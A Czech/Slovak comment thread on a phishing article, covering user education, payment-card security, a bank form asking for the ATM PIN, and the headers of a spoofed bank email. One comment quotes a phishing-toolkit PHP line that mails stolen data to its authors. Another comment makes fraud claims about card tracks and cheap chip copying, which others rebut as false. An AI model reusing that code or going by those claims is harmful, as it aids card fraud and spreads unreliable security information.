Názory k článku
Jak se dělá phishing

ale právě že ne.

1) počítače, který je rozesílají, patří právě uživatelům, který jsou schopný bez rozmyslu na všechno klikat

2) ty emaily jsou určený zase jenom uživatelům, kteří bez nejmenších problémů na odkaz kliknou a vyplní vše co po nich stránka bude chtít a údaje odešlou

právě takové uživatele je třeba varovat. tím bude míň zombie počítačů, míň napálených uživatelů a nakonec míň zisku pro autora phishingu.

"který jsou schopný bez rozmyslu na všechno klikat"

Problém je v tom, že v bance by měli aspoň 5 minut, při zakládání účtu, věnovat těmto bezpečnostním rizikům.

A nebo posílat při výpisech (třeba kvartálně) i nějaké "výukové" kartičky.

Jde především o běžné uživatele, a ti neví, co to phising je, a z TV se to nedozví...

Slabinou celého podvodu je přece samotný převod prostředků z účtu. Víme přece odkud a kam a účet si nezaložíte jen tak. Můžeme samozřejmě přeposlat peníze na již hacknutý účet, ale jakou máme jistotu, že majitel jej mezitím nezablokuje nebo se nezmění přístup.
Jak tedy probíhá tahle část?

neprobíhá, příhlášení na účet je fikce fungují jakékoliv údaje. cílem je "ověřit" že je vaše karta v pořádku a odtam ty peníze dostat. Pak budete těžko prokazovat že jste se nekoupil roční členství na gaystránkách.

Když je to ve velkém tak to zboží skutečně někomu dodají, tratit 50% zní sice hodně ale když si uvědomíte že jsou to vše ukradené peníze nehraje ztráta 50% žádnou roli.

Ano, je to v článku na konci a já to lajdácky nedočetl, takže se omlouvám za zbytečný dotaz.

Tohle je dobrej vyukovej material pro novinare policii, i TV stanice. Treba si to nekdo precte a prestanou placat blbosti o tom jak nekoho hledaj a jak je to jednoduchy ho chytit. Vzdycky se musim smat i brecet kdyz to posloucham. Pritom ti pseudo odbornici o tom nic nevi a jeste ukazou xicht v TV a tvrdi jak to maji zvladnuty a vlastne toho pachatele skoro maji.

všechno začíná u "hlouposti" uživatelů. je přeci úplně jedno jaký kdo má OS. systém můžeš mít x krát zabezpečený a potom stačí jeden uživatel, co jenom kliká na OK a ani si nepřečte, na co se ho to vlastně ptá.

takže jedině co pomůže je osvěta, za což Lupě děkuji. ještě víc takových článků.

Přidávám se. Skvělý aktuální článek. Možná by bylo dobré využít nějaké spammerské databáze .cz adres a rozeslat tento článek:-) Budu na něj odkazovat kde jen to půjde.

Jednou jsem sledoval běžného (znalého uživatele) při serfování po porno stránkách, nestačil jsem se divit s jakou lehkostí klikal na OK, OK, OK (zřejmě měl lehce červeno před očima). Problém je v lidech, je to jako jezdit s autem po městě bez absolvování autoškoly(to by každému přišlo divné), ale počítačem ohrožovat to se smí :-D Používal jsem jádro IE v automatickém skriptu, ten načítal kdejakej balast (samozřejmě stránky se spyware warezem a podobnej hnůj) po uložení cca 100tisíc celkem i nebezpečnejch stránek v počítači nic nebylo. Takže brečet že systém je nebezpečnej je zcela mimo, uživatel je mnohem nebezpečnější.

Přesně tak, je třeba vzdělávat uživatele.

A poděkujme mimo jiné zázračnému NOD32 a tvůrcum antivirů obecně, kteří se tři roky tvářili že spyware a trojany nejsou viry a tudíž se jich řešení netýká.

ach jo, je to hruza, ze si TV Nova muze dovolit ve svych zpravach sirit lzi. o aferach se smyslenymi reportazemi na TV Nova jsem slysel uz dost... zejmena jsem se nasmal, kdyz nejaky hacker "hacknul" seznam.cz - skoda, ze se seznam s Novou nejak dohodl mimosoudne, mel je zalovat o posledni euro :-)

, a kdo krade, ten muze i zabit ;)

a od vrazdy je jen krucek ke spatnemu vkusu :)

:)

"Mr-Brain do PHP skriptů doplnil umně skrytý kód, který všechny zjištěné informace odesílá zároveň tvůrcům toolkitu. "

...
$send="al-brain@hotmail.fr,albrain08@yahoo.fr,albrain08@gmail.com";
mail($send,$subject,$message,$headers)
...

(nahodne vybrany toolkit z linkovaneho webu)

opravdu umně skrytý kód...

V clanku je par nepresnosti - PIN kod a cislo karty este samo osebe neumozni utocnikom "vyuzit kartu, ako keby ju mali" - na to potrebuju cely obsah magnetickeho pruzku, ktory uzivatelovi bezne nie je znamy, utocnik by sa musel fyzicky dostat ku karte (skimming). Taktiez sa v clanku nespravne pouziva vyraz "CCV" - v skutocnosti sa jedna o Card Security Code (CSC) a jeho varianty CVV2/CVC2 (v zavislosti od kartovej spolocnosti) - viac info na http://en.wikipedia.org/wiki/CVV2

Dalsim citlivym udajom (ktory sa v clanku nespomina) je datum expiracie karty, preto treba davat tieto udaje (cislo karty, expiracia, CVV2/CVC2) len overenym tretim stranam (obchodnikom), samotny PIN netreba hovorit NIKOMU - nemoze vas on poziadat ani len pracovnik banky.

Pre doplnenie - zaoberam sa bezpecnostou v kartovom biznise.

Měl by sis opravit svoje znalosti, odborníku na bezpečnost v kartovém businesu. Při platbě přes internet ti je magnetický proužek akorát tak pro potěchu oka. Stačí přece znát jen pár údajů jako je jméno na kartě, číslo karty, doba platnosti a ověřovací kód. Copak jsi nikdy neplatil kartou přes internet?...

Urcite neplatil "odbornici na bezpecnost v kartovem businesu" takové věci nedělají :-D

ale vzdyt ano, staci si precist, ze reaguje na vetu "vyuzit kartu, ako keby ju mali" (fyzicky)...tzn pro vybery. Prectete si clanek a az potom ctete komentare

Pre upresnenie: kazdy hovorite o inom type platobnej karty.

Ty hovoris o tzv. embossovanych kartach, kde skutocne na uskutocnenie (napr. internetom) platby postaci par udajov uvedenych na karte. A potom su tu udaje ulozene na magnetickom pruzku alebo chipe. Je obvykle, ze jedna "plastova" karta obsahuje naraz VIAC sposobov ulozenia udajov - od embossovania az po chip.

Cize pravdu ma aj majo, ked tvrdi napr. ze skopirovanie chipu je (ja tvrdim obtiazne) nemozne. A pravdu ma Jarda, ktory tvrdi, ze postaci vediet z embossovanej karty potrebne udaje. Akurat, ze obaja hovorite o niecom inom aj ked spadajucom pod jedno oznacenie "platobna karta".

Pre Jarda: mozes kludne vlastnit virtualnu "embossku" urcenu len pre platenie cez internet - prave kvoli tomu, ze ti staci poznat tieto udaje.

Rovnako mozes vlastnit neembossovanu kartu urcenu vyhradne na platenie cez POS terminaly a vyberanie z ATM, ktoru ale nemozno vyuzit na platby cez internet.

Nepracujem ako odbornik v kartovom biznise :-)

Diki za reakciu, nechcel som ist do detailov, iba som chcel poukazat na nezrovnalosti.

OK, opravim sa - skopirovanie chipu je takmer nemozne, resp. treba na to vynalozit prostriedky ktore neumerne prevazuju potencionalny zisk utocnika, takze sa mu to neoplati. Hovorim, nechcel som ist do detailov, beriem to viac-menej ako laicku diskusiu.

Embossku (bez magnetickeho pruzku a/alebo chipu) nepouzijes na vyber z bankomatu, preto som napisal ze spominane udaje (PAN a PIN) nestacia na zneuzitie karty "ako keby ju mali".

nechcel som reagovat, fakt ze nie, ale nedalo mi to
skopirovat chip je prakticky zabavka pre male deti

ziadne udaje z magnetickeho pruzku netreba. staci cislo karty, exp doba.
potom velmi zalezi na tom, aku ochranu karta v tej ktorej krajine pouziva
existuju tri
track 1, track 2 a track 2 +
prvy je v tvare CISLOKARTY^PRIEZVYSKO/MENO^EXPALGO
druhy je v tvare CISLOKARTY=ALGO

vobec nie je potrebne mat PIN a CVV2 (CVN). staci posledne 4 cisla karty (najlepsie mat celu kartu, ale stacia aj posledne ak vie utocnik o aku ide banku) a EXP dobu, ktoru sam nedokaze zistit (bez pristupov k PCI DB).

vidim ze ani pan docekal sa nevyhol zavadzajucim informaciam. tie ceny co uvadzate v clanku su odkial? phising toolkit stoji 5$+ a na mieru sa vyrabaju za 25$+. je velmi jednoduche ziskat presne smerovane toolkity a emaily profesionalnych phisherov vyzeraju mierne inak a aj ich cielenie (vid ebay, o ktorom sa nikdy nikde nehovorilo) bol krasnym dokazom uspesnosti osobneho phisingu. tato problematika je daleko komplexnejsia a zlozitejsia a nemyslim si, ze ju moze pokryt osoba, ktora o nej cita na weboch inych spolocnosti

"skopirovat chip je prakticky zabavka pre male deti" - to myslite vazne? Fakt ma to zaujima :) Co myslite pod "skopirovanim"? Ake typy chipov mate na mysli - SDA, DDA alebo nebodaj CDA?

Ale ved ja nehovorim ze sa nedaju robit platby na internete aj bez magstripe (alebo chipu), viem ake udaje treba na e-commerce, len som reagoval na text ze PAN a PIN staci utocnikovi aby "vyuzil kartu, ako keby ju mal" - chapem fyzicky, napr. na vybery z bankomatu. Tie sa bez magstripe a chipu (ak ide o EMV kartu) robit nedaju.

skopirovat chip = jediny chip na platobnych kartach je RFID a tie su uz davno out
http://www.engadget.com/2006/10/23/researchers-hack-rfid-credit-cards-big-surprise/
len maly priklad. samozrejme ze je toho daleko viac, staci otvorit google. vsetko sa sputilo na tohtorocnom cc a black-hat.

ja hovorim, ze nik nepotrebuje data z magistripe a chipu uz vobec nie. vsetko je dogenerovatelne, len staci vediet ako. netvrdim ze je to bezna znalost, ale da sa kupim za par 100$.

Pokial viem, tak na vygenerovanie vsetkych tychto veci treba mat kluce, takze to asi nebude take jednoduche. Aj ked samozrejme vsetko sa da vygenerovat nahodne a ist stylom pokus-omyl, ale to je lahko odchytitelne.

Ohladom hacku chipu - ano, pocul som o tom, ale ako som pisal vyssie - je otazne kolko energie a penazi treba vynalozit na to, aby mi niekto "skopiroval" chip, t.j. vyrobil rovnaku kartu a pripadne z nej aj "vytiahol" PIN - tak aby s nou mohol urobit vyber/transakciu. Je to ovela narocnejsie ako potencionalny zisk. Kym existuju menej narocne sposoby (socialne inzinierstvo) - nikto sa tym nebude zaoberat.

no nie kluce ale alga. je dost jednoduche ich ziskat, ale to uz je ina tema.

technologicke riesenie vychadza na tusim 300$. cize sa to vrati kolkymi, jednou ci dvoma kartami? socialne inzinierstvo je fajn, ale nie na taketo veci. pre mna je phising az posledna moznost, existuju lepsie sposoby ako ziskat to, co clovek chce.

neviem ci v komentaroch ci v clanku niekto pisal, ze nakupuju vlastne veci cez aukcie. to robia len ti, co sa vsemozne snazia ziskat peniaze z kariet (alebo si posielaju cez paypal). to je proste kravina, pretoze je to 3rd party poskytovatel a uzavretie akehokolvek prevodu trva viac ako 24h ak sa nejedna o AMEX alebo DISCOVERY alebo DINERS, tam to funguje inak

"jediny chip na platobnych kartach je RFID"
To je pekna blbost. Vite vubec, co je to RFID (Radio Frequency Identification)? Videl jsem uz peknou radku cipovych platebnich karet, ale na zadne z nich rozhodne nebyl RFID cip.

"skopirovat chip je prakticky zabavka pre male deti"
To je take pekna blbost. Ten odkazovany clanek pouze rika, ze se jim povedlo odposlechnout cislo karty a jmeno drzitele, ne ze se jim podarilo zkopirovat cip. To je dost velky rozdil. Vyssi mira bezpecnosti cipovych karet je dana tim, ze narozdil od snadno zkopirovatelneho magnetickeho prouzku cip neslouzi pouze pro pasivni uschovani informaci, ale ze se umi aktivne zapojit do procesu autorizace transakce. Kdyz to zjednodusim, tak cip umi transakci elektronicky podepsat pomoci privatniho klice, ktery je ovsem ulozen uvnitr cipu a nelze jej bezne dostupnym zpusobem precist. K tomu byste potreboval opravdu specialni vybaveni minimalne za stovky tisic dolaru a hlavne dostatek casu.

Ano, pro elektronickou transakci cip nepotrebujete, to je pravda, ale Vase dve vyse zminena tvrzeni jsou naproste nesmysly.

samozrejme, zle som sa vyjadril v zhluku textu. chip platobnych kariet chip & pin je uz dnes celkom lahko odchytitelny a nasimulovatelny (vid posledne ccc, treba si pozriet prednasku z druheho dna tusim).

http://www.news.com/8301-10789_3-9875961-57.html?part=rss&tag=feed&subj=DefenseinDepth

tu je to z black-hat tohtorocneho. plus, vidno ze netusite ako sa obchadzaju taketo obmedzenia. atm a pos pracujuce s chipom su len v niekolkych krajinach a preto sa zlodeji masivne stahuju do zemi ako thajsko, kde tieto obmedzenia neplatia. to je ta lacnejsia cesta, ako zbytocne predrazovat proces klonovania karty, ktory tu uz niekto spominal. stovky tisic dolarov dnes uz ani nestoja auta, ledva domy ;) treba zit dnes, nie 20 rokov dozadu. staci otvorit ebay a dostatocne zariadenia (pinpady a ine technicke vybavenie) ziskate za par 100 dolarov

Reagoval jsem pouze na dve Vase nepravdiva tvrzeni, ze se jedna o RFID cipy a ze je mozne je velmi snadno zkopirovat. O zpusobu obchazeni jsem nic nerikal (ani u nas jeste vsechny ATM nepouzivaji cipy), takze Vase spekulace o tom, ze o nich nic netusim, je zcela mimo misu. Bezpecnost zajistovana cipem zacne byt ucinna v okamziku, kdy bude penetrace bankomatu a platebnich terminalu pracujicich s cipem dostatecne velka na to, aby banky zacaly vydavat karty bez magnetickeho prouzku.

Zarizeni na klonovani cipu za par set dolaru rozhodne neziskate, udaje typu privatni klic nelze precist pomoci standardniho protokolu pro komunikaci s cipem (lze jej tak pouze zapsat), takze nestaci k jeho kontaktum pripojit nejake elektronicke zarizeni, ale musite fyzicky otevrit jeho pouzdro.

> samotny PIN netreba hovorit NIKOMU - nemoze vas on poziadat ani len pracovnik banky.

vážně nemůže? už docela dlouho si o něj říkají dokonce na webu u citibank :-(

http://www.citibank.cz/czech/homepage/index.htm
odkaz "citibank online vstup", ještě jednou stejný odkaz (tentokrát vede jinam), dole "zaregistrovat se"

Nemáte ještě své uživatelské jméno a heslo?
Abyste mohl(a) využívat služeb Citibank Online, musíte se zaregistrovat a vytvořit si uživatelské jméno a heslo. Mějte při ruce svou kartu, budete potřebovat její číslo a Váš A-PIN (4-místný číselný kód pro výběry hotovosti z bankomatu). Bez těchto informací nelze přístup vytvořit.


Registrace k užívání služby Citibank Online
Vyberte, do jaké služby se chcete přihlašovat:
Prosím, zvolte svůj profil:
Číslo karty:
A-PIN 4-místný kód pro výběr z bankomatu:


no neposílejte pak phishingové maily, když jsou lidi zvyklí psát PIN ke kartě na webu :-|

Citibank je vtipna :)

A jeste lepe, nedavt tyto udaje ani obchodnikum a vyuzivat certifikovanych autorit, ala verisign

Nemůžou se bezpečnostní složky více států domluvit, poslat jim číslo a heslo na účet, kde jsou nějaký peníze a pak sledovat, kam odfrčí? Banky by to mohly ve vlastním zájmu podpořit, ne?

... ale jen pokud banka je ochotna pouzit jeho metody. Nevyhoda pri jakekoliv takovehle cinnosti je ze vas svazuji nejake predpisy.
Jinak samozrejme dopatrat se nekam dal je mozne. Minimalne by se dali odstrihnout site BOTNETu, ktere rozesilaji.
Je ironicke ze kazdeho Frantu, kterej si stahne z netu nejaky ty MP3 by Protipiratska unie odstrihla od netu nejlip na dozivoti. Ale smejdi co takhle zasvinej net SPAMEM je netrpi.

Banky by meli vzit ze sve hromady penez aspon par korunek (a maji na to) a udelat tym, ktery by byl schopny takoveto utoky v zakladech nicit.

Jak odstrihnete celou distribuovanou IRC sit? To by vas hodne lidi hnalo, kdybste se o to pokusil.

Hnalo kam? SlOuží jejich software k ovládání botnetu? Slouží. Tak ať si udělají ve své milé síti pořádek nebo VYPNOUT!

Mno, me prislo asi 5 ruznych verzi, od azbuky az po zcela cesky napsana "varovani" prave pred temito podvodnymi emaily - takze mimo jste spis Vy. Budte rad, ze Vam toho chodi tak malo, mne by radi vybilili konto tak 10x denne...

Cheche - včera mě chtěli vybílit 150x !!!
A CitiBank po mně žádnej PIN nechce. Mám takový přívěšek, naťukán nějaký tajný kód, odpoví mi to jiným tajným kódem a ten napíšu na Inet. eBanka to řeší pře šifrovaný SMS...

není všechno zlato co se třpytí a skutečnost, že tyhle maily chodi v azbuce jsem komentoval už mockrát. pochopitelně některé, jeden příklad níže. Jinak je to ale vcelku logické, většina phishing kitů v současné době je tvořena ruskými programátory. A tady nejde o nic jiného, než o hromadné použití jednoho a téhož phishing kitu více subjekty.

Return-Path: <www@eiscanner01.extremezone.com>
Delivered-To:
Received: (qmail 394 invoked by uid 1001); 20 Mar 2008 07:49:36 -0000
Delivered-To:
Received: (qmail 22881 invoked from network); 20 Mar 2008 07:49:36 -0000
Received: from unknown (HELO mailgw1.explorer.cz) (81.0.233.92)
by mail.explorer.cz with SMTP; 20 Mar 2008 07:49:36 -0000
Received: by mailgw1.explorer.cz (Postfix, from userid 107)
id 903CB80AA93; Thu, 20 Mar 2008 08:49:36 +0100 (CET)
Received: from mailgw1.explorer.cz (localhost [127.0.0.1])
by mailgw1.explorer.cz (Postfix) with ESMTP id F076B80AA94
for <>; Thu, 20 Mar 2008 08:49:35 +0100 (CET)
Received: from eiscanner01.extremezone.com (eiscanner01.extremezone.com [64.140.128.25])
by mailgw1.explorer.cz (Postfix) with ESMTP
for <>; Thu, 20 Mar 2008 08:49:35 +0100 (CET)
Received: from eiscanner01.extremezone.com (localhost.extremezone.com [127.0.0.1])
by eiscanner01.extremezone.com (8.13.2/8.13.2) with ESMTP id m2K7nghK048750
for <>; Thu, 20 Mar 2008 00:49:42 -0700 (MST)
Received: (from www@localhost)
by eiscanner01.extremezone.com (8.13.2/8.12.8/Submit) id m2K7nfvK048738;
Thu, 20 Mar 2008 00:49:41 -0700 (MST)
Date: Thu, 20 Mar 2008 00:49:41 -0700 (MST)
Message-Id: <200803200749.m2K7nfvK048738@eiscanner01.extremezone.com>
To:
Subject: [SPAM] Ceska Sporitelna - SERVIS 24 Internet Banking
From: Ceska Sporitelna <servis24-centrala@csas.cz>
Reply-To: servis24-centrala@csas.cz
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
X-Virus-Scanned: ClamAV using ClamSMTP
X-DSPAM-Result: Spam
X-DSPAM-Processed: Thu Mar 20 08:49:36 2008
X-DSPAM-Confidence: 0.9931
X-DSPAM-Probability: 1.0000
X-DSPAM-Signature: 47e2171015351804284693

Nedejte se mýlit názvem stránky, ale provedl jsem rozbor dvou mailů a zjistil zajímavé skutečnosti. Např.: Kliknutím na anglickou verzi jste pravděpodobně ve skutečném Servisu 24. ČS mi to nechce potvrdit ani vyvrátit. Ptal jsem se už dvakrát.
http://fiktivnihospoda.sweb.cz

HAHA. To je vtip ta stránka?

Že by zatím stále Česká spořitelna? Usuzuji podle https://

ČS za tím nestojí, ale dělá to chytrý člověk. Falešný přihlašovací formulář se volbou angličtiny změní na pravý a uživatel je ve skutečném prostředí servisu 24. Pachatel nechce mít s cizinci nic společného. Co kdyby jeho vláda se začala bít za práva svého občana. Koncovka ro míří do Rumunska a tudíž do EU a tam je to možná trestné.

Člověče, už to přestaňte rozvíjet, zasmáli jsme se a to stačí.

Jste mimo i tím vaším "odborným rozborem" na té stránce.

Stránka byla pro poučené laiky a nebyla zbytečná. Odkazy z mailů už nechodí. I hackeři chodí na diskuze. Já akci maily fakt považuji za klukovinu a k smíchu je celý svět a jsem rád, moje stránka nebyla vyjímkou. Jediná věc, která mi není směšná je, že zvolením anglické verze na formuláři podvodné stránky se dostaneme do velice věrohodného prostředí a já jsem přesvědčen, že se dostáváme do skutečného servisu24. Uvítal bych názor na poslední screenshot mé stránky.

> Jediná věc, která mi není směšná je, že zvolením anglické verze na formuláři
> podvodné stránky se dostaneme do velice věrohodného prostředí a já jsem
> přesvědčen, že se dostáváme do skutečného servisu24.

A proč by z falešné stránky nemohl vést normální odkaz na stránku pravou? Co je na tom podivného? :-)